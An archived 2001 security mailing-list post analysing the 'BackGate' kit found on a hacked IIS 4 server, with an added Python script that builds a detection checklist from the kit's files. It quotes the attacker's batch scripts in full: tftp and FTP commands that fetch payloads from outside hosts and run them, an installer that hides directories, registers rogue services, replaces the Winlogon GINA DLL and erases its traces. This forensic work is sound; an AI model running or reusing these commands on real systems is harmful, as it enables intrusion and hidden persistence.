Security Incidents mailing list archives

FW: I've been hacked! [BackGate Kit]


From: Matt Scarborough <vexversa () USA NET>
Date: Tue, 20 Feb 2001 18:14:51 EST

Moderator: Incidents, Forensics, or the bit bucket, whatever you like.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+                       FW: I've been hacked!!                       +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

On Mon, 19 Feb 2001 22:21:51 -0500, "Larry K." wrote

I am fairly new to security issues, but I am very experienced with Windows.
Today I found that someone broke into my NT 4.0 server. It is running IIS 4
for an internal web page and someone copied some files to my scripts
directory. They were able to execute a file called dl.exe that was hogging
all of my CPU cycles. I found that I had not removed anonymous access and
access from the outside. Can anyone help me find out how they got in and
make sure that they can't get back in? Any help would be appreciated.

Here is a list of the file names:

00.d
dl.bat
dl.exe
ftpcmds.txt

dl.bat contains the following:

@echo off
cd \Inetpub\scripts
startDL:
tftp.exe -i web004.2coolweb.com get DL.exe
if not exist DL.exe goto startDL
start /w DL.exe
ren 00.D install.bat
attrib TFTP* -r
attrib DL.exe -r
del TFTP*
del DL.exe
install.bat %1
exit

ftpcmds.txt contains the following:

open 216.205.125.115 29292
user DL
DL
get 00.D
get 01.D
get 02.D
get 03.D
get 04.D
get 05.D
get 06.D
get 07.D
get 08.D
get 09.D
get 10.D
get 11.D
get 12.D
get 13.D
bye
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+                     END FW: I've been hacked!!                     +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

While this doesn't shed much light on how Larry K. was hacked, it illustrates
the results of leaving IIS un-hardened.

I ambled over to
tftp://63.84.169.1:69 (web004.2coolweb.com)
for DL.EXE, and then to
ftp://DL@216.205.125.115:29292 (115-216.205.125.dellhost.com)
for the BackGate kit that was downloaded to Larry's IIS4 box.

Below is what I found. It creates a warez repository and an FTP proxy.
No response to attempts at contacting host owners or upstream of the (T)FTP
site(s) distributing malware.

Matt 2001-02-20

Text strings courtesy of BinText by Robin Keir
http://www.foundstone.com
UPX is The Ultimate Packer for eXecutables
http://upx.tsx.org

=====================
  Contents of DL.EXE
tftp from 63.84.169.1
=====================
UPX 1.02 contents Un-packed

00001C10   00401C10      0   wininet.dll
00001C20   00401C20      0   FtpGetFileA
00001C64   00401C64      0   FtpPutFileA
00001CA8   00401CA8      0   FtpSetCurrentDirectoryA
00001D08   00401D08      0   InternetOpenA
00001D50   00401D50      0   InternetConnectA
00001F70   00401F70      0   FtpOpenFileA
00001FB8   00401FB8      0   FtpDeleteFileA
000016DF   004016DF      0   @*\AZ:\FTPInstFileDL\Project1.vbp
000019D4   004019D4      0   vb wininet
00001CC4   00401CC4      0   /05.D
00002144   00402144      0   216.205.125.115
00002174   00402174      0   /00.D
00002194   00402194      0   /01.D
000021B4   004021B4      0   /02.D
000021D4   004021D4      0   /03.D
000021F4   004021F4      0   /04.D
00002224   00402224      0   /06.D
00002244   00402244      0   /07.D
00002264   00402264      0   /08.D
00002284   00402284      0   /09.D
000022A4   004022A4      0   /10.D
000022C4   004022C4      0   /11.D
000022E4   004022E4      0   /12.D
00002304   00402304      0   /13.D
=====EoF=====

================
Contents of 00.D
================
@echo off
echo Renaming Files
ren 01.D dir.txt
ren 02.D FireDaemon.exe
ren 03.D login.txt
ren 04.D MMtask.exe
ren 05.D NewGina.dll
ren 06.D reggina.exe
ren 07.D regit.exe
ren 08.D restrict.exe
ren 09.D restsec.exe
ren 10.D settings.reg
ren 11.D SUD.exe
ren 12.D makeini.exe
ren 13.D SUD.ini
echo Making ini
.\makeini.exe %1
echo Making Dirs
md %windir%\system32\os2\dll\new
attrib %windir%\system32\os2\dll\new +s +h
.\restrict.exe %windir%\system32\os2\dll\new
md %1:\adminback0810\root
attrib %1:\adminback0810\root +s +h
.\restrict.exe %1:\adminback0810\root
md %1:\adminback0810\root\system
attrib %1:\adminback0810\root\system +s +h
.\restrict.exe %1:\adminback0810\root\system
md %1:\adminback0810\root\system\dll
attrib %1:\adminback0810\root\system\dll +s +h
.\restrict.exe %1:\adminback0810\root\system\dll
echo Copying Files
copy .\FireDaemon.exe %windir%\system32\os2\dll\new\ > nul:
copy .\SUD.exe %windir%\system32\os2\dll\new\ > nul:
copy .\SUD.bak %windir%\system32\os2\dll\new\ > nul:
copy .\login.txt %windir%\system32\os2\dll\new\ > nul:
copy .\dir.txt %windir%\system32\os2\dll\new\ > nul:
copy .\MMtask.exe %windir%\system32\os2\dll\new\ > nul:
copy .\newgina.dll %windir%\system32\ > nul:
attrib %windir%\system32\newgina.dll +s +h
echo Setting up Registry
.\regit.exe .\settings.reg
echo Installing Services
set MXBIN=%windir%\system32\os2\dll\new
set MXHOME=%windir%\system32\os2\dll\new
%windir%\system32\os2\dll\new\Firedaemon.exe -i OS2SRV "%windir%\system32\os2\dll\new" "%windir%\system32\os2\dll\new\SUD.exe" "" Y 0 0 N Y
%windir%\system32\os2\dll\new\Firedaemon.exe -i MMTASK "%windir%\system32\os2\dll\new" "%windir%\system32\os2\dll\new\MMtask.exe" "" Y 0 0 N Y
.\reggina.exe
echo Waiting 5 sec.
.\restsec.exe 5
echo Starting Services
net start os2srv
net start mmtask
echo Services Installed and Started
echo Deleting Install-Files
del FireDaemon.exe 
del makeini.exe
del SUD.exe
del SUD.ini
del SUD.bak
del login.txt
del dir.txt
del MMtask.exe
del newgina.dll
del restrict.exe
del regit.exe
del settings.reg
del reggina.exe
del restsec.exe
attrib E.asp -r
del E.asp
del dl.bat
del install.bat
=====EOF=====

================
Contents of 01.D
    DIR.TXT
================
---
%ServerKBps KBps Current bandwith used
%Dfree MB free
---
=====EoF=====

================
Contents of 02.D
 FIREDAEMON.EXE
================
UPX 1.02 contents Un-packed


File pos   Mem pos      ID   Text
========   =======      ==   ====
0000E2AC   0040E2AC      0   v0.09c
0000E2B4   0040E2B4      0    (c) 1999-2000 Sublime Solutions
0000E2D5   0040E2D5      0   Usage:   
0000E2E0   0040E2E0      0    [-i <ServiceName> <AppDir>
0000E2FC   0040E2FC      0            [[AppName] [AppOpts] [Restart] [Mask] [Priority] [Interact] [Autostart]]
0000E51E   0040E51E      0   Purpose: 
0000E528   0040E528      0    allows Win32 applications to be installed as
0000E556   0040E556      0            a Windows NT/2K service. The service can be run as the System Account
0000E5A5   0040E5A5      0            or as an NT/2K domain account.
0000F05C   0040F05C      0   URL:        http://www.firedaemon.com/
0000F083   0040F083      0   Bugs:       Please report bugs to support () firedaemon com
=====EoF=====

================
Contents of 03.D
  LOGIN.TXT
================
---
Running for:
%ServerDays Days, %ServerHours Hours, %ServerMins Minutes and %ServerSecs Seconds
---
%ServerKbUp Kilobytes uploaded in %ServerFilesUp Files
%ServerKbDown Kilobytes downloaded in %ServerFilesDown Files
%ServerAvg KBps Average bandwith used
%Uall User(s) connected since server start 
%UNow User(s) currently connected
=====EoF=====

================
Contents of 04.D
  WG3ENG9X.EXE
================
UPX 1.02 contents Un-packed

000DC38A   004E398A      0   VS_VERSION_INFO
000DC434   004E3A34      0   WinGate 3.0 Engine for Windows 9X
000DC4F4   004E3AF4      0   WinGate Engine
000DC51A   004E3B1A      0   FileVersion
000DC534   004E3B34      0   1, 0, 1, 4
000DC582   004E3B82      0   LegalCopyright
000DC5B6   004E3BB6      0    1998 Qbik New Zealand Limited
000DC61C   004E3C1C      0   WinGate (TM)
000DC63E   004E3C3E      0   OriginalFilename
000DC660   004E3C60      0   WG3ENG9X.EXE
=====EoF=====

================
Contents of 05.D
  NEWGINA.DLL
================
Export Table
Name:   NEWGINA.dll
Characteristics:        00000000
Time Date Stamp:        38642141
Version:        0.00
=====EoF=====

================
Contents of 06.D
  REGGINA.EXE
================
File pos   Mem pos      ID   Text
========   =======      ==   ====
00004348   00404348      0   Microsoft Visual C++ Runtime Library

000050B4   004050B4      0   System\CurrentControlSet\Services\OS2srv
000050E0   004050E0      0   DisplayName
000050EC   004050EC      0   MMtask

000050F4   004050F4      0   System\CurrentControlSet\Services\MMtask
00005120   00405120      0   MSgina.dll
0000512C   0040512C      0   newgina.dll
00005138   00405138      0   OriginalGinaDLL
00005148   00405148      0   GinaDLL
00005150   00405150      0   Software\Microsoft\Windows NT\CurrentVersion\Winlogon
=====EoF=====

================
Contents of 07.D
  REGEDIT.EXE
================

00009548   00409548      0   Compressed by Petite (c)1999 Ian Luck.
0000F7A6   0041ABA6      0   VS_VERSION_INFO
0000F96A   0041AD6A      0   Microsoft Corp. 1993-1995
0000F8EC   0041ACEC      0   4.00.1111 REGEDIT.EXE
=====EoF=====

================
Contents of 08.D
   REGIT.EXE
================

000000C8   004000C8      0   Compressed by Petite (c)1999 Ian Luck.

Import Table
ADVAPI32.dll
Ordinal Function Name   
0000    AddAce
=====EoF=====

================
Contents of 09.D
 RESTSEC.EXE
================
IDW tools

File pos   Mem pos      ID   Text
========   =======      ==   ====
00006620   06069220      0   Copyright (C) Microsoft Corp. 1981-1996
00006676   06069276      0   OriginalFilename
00006698   06069298      0   Sleep.Exe and Beep.Exe
000066CE   060692CE      0   ProductName
000066E8   060692E8      0   Microsoft(R) Windows NT(TM) Operating System
=====EoF=====

================
Contents of 10.D
REGEDIT 4 format
 SETTINGS.REG
================
<lots snipped>

[HKEY_LOCAL_MACHINE\SOFTWARE\Qbik Software\WinGate\Services\FTP Proxy server]
"ServiceType"="CFTPService"
"Name"="FTP Proxy server"
"Description"="FTP Proxy server"
"PortNumber"=dword:0000243b
"Enabled"=dword:00000001
"TimeOutSessions"=dword:00000001
"SessionTimeout"=dword:00000258
"SpecificBinding"="127.0.0.1"
"SOCKS4Password"=""
"BypassProxyOnLocal"=dword:00000000

=====EoF=====

================
Contents of 11.D
    SUD.EXE
================
UPX 1.02 contents Un-packed

File pos   Mem pos      ID   Text
========   =======      ==   ====
0014DFE0   0054F5E0      0   Serv-U FTP Server v3.0 build 9 - Copyright (c) 1995-2001 Cat Soft, All Rights Reserved - by Rob Beckers
00178954   00582754   2075   This trial version of Serv-U is out-of-date! All domains are offline
=====EoF=====

================
Contents of 12.D
  MAKEINI.EXE
================
Project1.exe
Import Table

MSVBVM60.DLL
Ordinal Function Name   
0000    MethCallEngine
0000    EVENT_SINK_AddRef

================
Contents of 13.D
    SUD.INI
================
[GLOBAL]
TryOut=Full
Version=3.0.0.7
LocalSetupPassword=<snipped>
LocalSetupPortNo=45092
DirCacheSize=60
PacketTimeOut=120
[DOMAINS]
Domain1=0.0.0.0||19216|Psychotic|1
[Domain1]
LogSystemMes=0
LogSecurityMes=0
LogGETs=0
LogPUTs=0
LogFileSystemMes=0
LogFileSecurityMes=0
LogFileGETs=0
LogFilePUTs=0
ReplyHello=PsychoticDreams
ReplyHelp=Help yourself.
ReplyNoAnon=no ANONYMOUS.
ReplyNoCredit=Upload some more.
ReplySYST=guess
ReplyTooMany=User limit reached.
ReplyDown=Server going offline.
ReplyOffline=Server offline.
DirChangeMesFile=C:\winnt\system32\os2\dll\new\dir.txt
User1=AdminIt|1
User2=MistarZet|1
User3=Tectonic|1
User4=nevermind|1
User5=Unibomber|1
User6=Nicodeimous|1
User7=Catie|1
User8=Mantis|1
User9=Pr0vit0|1
User10=X-Man|1
User11=FXskater|1
User12=delon15|1
User13=BigPun|1
User14=tafkamk|0
User15=Vegeetz|0
User16=Corsair|0
User17=palmleaf|0
User18=polux|0
User19=Termin-X|0
User20=NextLev|0
User21=X-byte|0
User22=XTracer|0
User23=Hooterman|0
User24=Section|0
User25=nightreg|0
User26=AssOnFire|0
User27=ZeroCode|0
User28=thunderbolt|0
<snipped>
=====EoF=====

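An added example, not part of Matt's post and not code from the kit: a Python script that reads the kit's own text artifacts quoted above (the 00.D installer, the WinGate settings.reg export and the Serv-U SUD.ini) and turns them into a triage checklist for a suspect host: FireDaemon service names, directories marked +s +h, dropped files, listening ports and FTP accounts. The three inputs are constructed excerpts of the quoted files (the FireDaemon lines are rejoined onto one line each); the WinGate port comes from dword:0000243b, which is 9275 decimal; the Winlogon GinaDLL entry is not in the batch file and is added as a fixed check because the reggina.exe strings show that value being rewritten. Function names, the WINGATE_KEY constant and the raw treatment of the Serv-U user flag are my assumptions.

```python
import re

# Constructed excerpts of the three text artifacts quoted in the write-up
# (00.D, settings.reg, SUD.ini); the wrapped FireDaemon lines are rejoined.
INSTALL_BAT = r'''@echo off
ren 05.D NewGina.dll
ren 11.D SUD.exe
md %windir%\system32\os2\dll\new
attrib %windir%\system32\os2\dll\new +s +h
md %1:\adminback0810\root
attrib %1:\adminback0810\root +s +h
copy .\SUD.exe %windir%\system32\os2\dll\new\ > nul:
copy .\newgina.dll %windir%\system32\ > nul:
attrib %windir%\system32\newgina.dll +s +h
%windir%\system32\os2\dll\new\Firedaemon.exe -i OS2SRV "%windir%\system32\os2\dll\new" "%windir%\system32\os2\dll\new\SUD.exe" "" Y 0 0 N Y
%windir%\system32\os2\dll\new\Firedaemon.exe -i MMTASK "%windir%\system32\os2\dll\new" "%windir%\system32\os2\dll\new\MMtask.exe" "" Y 0 0 N Y
'''
SETTINGS_REG = r'''REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Qbik Software\WinGate\Services\FTP Proxy server]
"PortNumber"=dword:0000243b
"Enabled"=dword:00000001
"SpecificBinding"="127.0.0.1"
'''
SUD_INI = r'''[GLOBAL]
LocalSetupPortNo=45092
[DOMAINS]
Domain1=0.0.0.0||19216|Psychotic|1
[Domain1]
User1=AdminIt|1
User2=MistarZet|1
User14=tafkamk|0
'''
WINGATE_KEY = r'HKEY_LOCAL_MACHINE\SOFTWARE\Qbik Software\WinGate\Services\FTP Proxy server'


def parse_install_script(text):
    """Walk the batch installer and record what it leaves on the host."""
    found = {"renamed": {}, "hidden": set(), "dropped": set(), "services": set()}
    for line in text.splitlines():
        line = line.strip()
        if m := re.match(r'ren\s+(\S+)\s+(\S+)', line, re.I):
            found["renamed"][m[1]] = m[2]            # NN.D -> real file name
        elif m := re.match(r'attrib\s+(\S+)\s+\+s\s+\+h', line, re.I):
            found["hidden"].add(m[1])                # system+hidden paths
        elif m := re.match(r'copy\s+(\S+)\s+(\S+)', line, re.I):
            src, dst = m[1], m[2]
            if dst.endswith('\\'):                   # "copy a dir\" keeps a's name
                dst += src.rsplit('\\', 1)[-1]
            found["dropped"].add(dst)
        elif m := re.search(r'firedaemon\.exe\s+-i\s+(\S+)', line, re.I):
            found["services"].add(m[1].upper())      # FireDaemon -i <ServiceName>
    return found


def parse_reg(text):
    """Parse a REGEDIT4 export into {key: {name: data}}; dword data becomes int."""
    keys, key = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith('[') and line.endswith(']'):
            key = line[1:-1]
            keys[key] = {}
        elif m := re.match(r'"([^"]+)"=(.*)', line):
            data = m[2]
            # dword:0000243b -> 9275; quoted strings lose their quotes
            keys[key][m[1]] = int(data[6:], 16) if data.startswith('dword:') else data.strip('"')
    return keys


def parse_serv_u_ini(text):
    """Pull the listener ports and accounts out of a Serv-U SUD.ini."""
    ports, users, section = set(), {}, None
    for line in text.splitlines():
        name, _, value = line.strip().partition('=')
        if name.startswith('['):
            section = name.strip('[]').upper()
        elif section == 'GLOBAL' and name == 'LocalSetupPortNo':
            ports.add(int(value))                    # Serv-U administration listener
        elif section == 'DOMAINS' and name.startswith('Domain'):
            ports.add(int(value.split('|')[2]))      # <ip>||<port>|<name>|<flag>
        elif re.fullmatch(r'User\d+', name):
            account, _, flag = value.partition('|')
            users[account] = flag                    # flag kept raw; its meaning is not verified here
    return {"ports": ports, "users": users}


def backgate_indicators():
    """Fold the three parsers into one triage checklist for a suspect host."""
    bat = parse_install_script(INSTALL_BAT)
    wingate = parse_reg(SETTINGS_REG)[WINGATE_KEY]
    serv_u = parse_serv_u_ini(SUD_INI)
    ports = set(serv_u["ports"])
    if wingate.get("Enabled") == 1:
        ports.add(wingate["PortNumber"])
    return {
        "services": bat["services"],
        "hidden_paths": bat["hidden"],
        "dropped_files": bat["dropped"],
        "listen_ports": ports,
        "ftp_accounts": serv_u["users"],
        # Not in the batch file: the reggina.exe strings show the Winlogon
        # GinaDLL value being rewritten, so it is a fixed check here.
        "registry": {r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GinaDLL": "newgina.dll"},
    }
```

Call backgate_indicators() and compare each list with what `net start`, `dir /a:h`, `netstat -an` and regedit show on the box; the WinGate proxy is bound to 127.0.0.1 per SpecificBinding, so it will not show up in an external port scan.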